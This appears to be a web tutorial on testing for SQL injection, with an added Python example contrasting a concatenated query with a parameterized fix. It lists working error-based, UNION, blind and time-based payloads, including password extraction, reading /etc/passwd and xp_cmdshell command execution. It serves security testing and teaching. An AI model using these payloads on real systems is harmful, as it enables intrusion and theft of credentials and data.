Step-by-step guide to testing for SQL injection vulnerabilities including error-based, blind, time-based, and UNION-based techniques.
Locate all parameters that interact with a database: URL parameters, POST body fields, cookies, and HTTP headers. Pay attention to search forms, login pages, and any feature that retrieves or filters data.
id=1'
search=test'
sort=name" OR 1=1--
Submit single quotes, double quotes, and special SQL characters to trigger database errors. Verbose error messages reveal the database type (MySQL, PostgreSQL, MSSQL, Oracle) and query structure.
' OR '1'='1
1' AND 1=CONVERT(int,(SELECT @@version))--
' AND extractvalue(1,concat(0x7e,(SELECT version())))--
Determine the number of columns with ORDER BY or UNION SELECT NULL. Then extract data by replacing NULL values with column names from information_schema tables.
' ORDER BY 1--
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT username,password,NULL FROM users--
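The error-based and UNION steps above, shown from the application side as an added example that is not from the original page: a deliberately vulnerable string-concatenated query next to its parameterized replacement, run against a constructed in-memory SQLite database. The `products` and `users` tables, their rows, and the `search_vulnerable`, `probe_vulnerable` and `search_safe` helpers are assumptions made for this illustration. The page's own payloads change the structure of the concatenated query (the `ORDER BY` probe leaks the column count through the raised error), while the bound parameter keeps the same input as a literal search term.

```python
import sqlite3


def build_db():
    """Constructed in-memory database standing in for the application's backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "s3cret"), (2, "bob", "hunter2")])
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT, price REAL)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)",
                     [(1, "widget", 9.99), (2, "gadget", 19.99)])
    return conn


def search_vulnerable(conn, term):
    """Defect: the search term is concatenated into the SQL text, so quotes in it
    change the query structure instead of staying part of the data."""
    sql = "SELECT id, name, price FROM products WHERE name = '" + term + "'"
    return conn.execute(sql).fetchall()


def probe_vulnerable(conn, term):
    """Run the vulnerable query and report whether it errored. An error message
    that reaches the client is the signal the error-based step relies on."""
    try:
        return ("ok", search_vulnerable(conn, term))
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))


def search_safe(conn, term):
    """Fix: a bound parameter. The driver passes the term as data, so the same
    payloads are compared literally against the name column and match nothing."""
    return conn.execute(
        "SELECT id, name, price FROM products WHERE name = ?", (term,)
    ).fetchall()


if __name__ == "__main__":
    conn = build_db()
    for payload in ["widget", "' OR '1'='1", "' ORDER BY 4--",
                    "' UNION SELECT id,username,password FROM users--"]:
        print(repr(payload), "vulnerable:", probe_vulnerable(conn, payload),
              "safe:", search_safe(conn, payload))
```

Running the block prints, for each input, what the concatenated query returns (every product for the tautology, an out-of-range ORDER BY error for the column probe, the users table for the UNION) beside the empty result the parameterized query gives for the same input.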
When no visible output exists, use boolean-based blind injection. Craft conditions that cause different responses depending on whether the condition is true or false.
' AND 1=1-- (true condition)
' AND 1=2-- (false condition)
' AND SUBSTRING(username,1,1)='a'--
If boolean differences are not observable, use time delays. A delayed response confirms the injection point is vulnerable, then extract data one character at a time.
'; WAITFOR DELAY '0:0:5'--
' AND IF(1=1,SLEEP(5),0)--
' AND pg_sleep(5)--
Attempt to read sensitive data, escalate privileges, or achieve remote code execution (e.g., xp_cmdshell on MSSQL, INTO OUTFILE on MySQL). Document the injection type, affected parameter, database type, and data exposed.
' UNION SELECT load_file('/etc/passwd'),NULL--
'; EXEC xp_cmdshell('whoami')--